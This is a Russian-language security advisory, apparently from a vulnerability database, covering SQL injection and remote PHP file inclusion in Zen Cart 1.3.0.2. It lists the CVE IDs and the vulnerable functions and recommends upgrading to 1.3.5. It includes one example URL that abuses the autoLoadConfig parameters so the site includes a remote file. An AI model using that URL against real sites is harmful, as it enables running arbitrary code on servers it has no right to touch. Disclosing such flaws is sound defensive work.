SQL-инъекция и PHP-инклюдинг в Zen Cart

Дата публикации:
21.08.2006
Дата изменения:
14.07.2008
Всего просмотров:
1940
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-4214
CVE-2006-4215
CVE-2006-4218
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Zen Cart 1.x
Уязвимые версии: Zen Cart 1.3.0.2, возможно более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и скомпрометировать целевую систему.

1. Уязвимость существует из-за недостаточной обработки входных данных в функциях "ipn_get_stored_session", "whos_online_session_recreate" и the "add_cart". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

2. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Пример:

http://[host]/index.php?autoLoadConfig[999][0][autoType]=
include&autoLoadConfig[999][0][loadFile]=[remote file]

URL производителя: www.zen-cart.com

Решение: Установите последнюю версию 1.3.5 с сайта производителя.

Ссылки: Zen Cart Multiple Vulnerabilities

или введите имя

CAPTCHA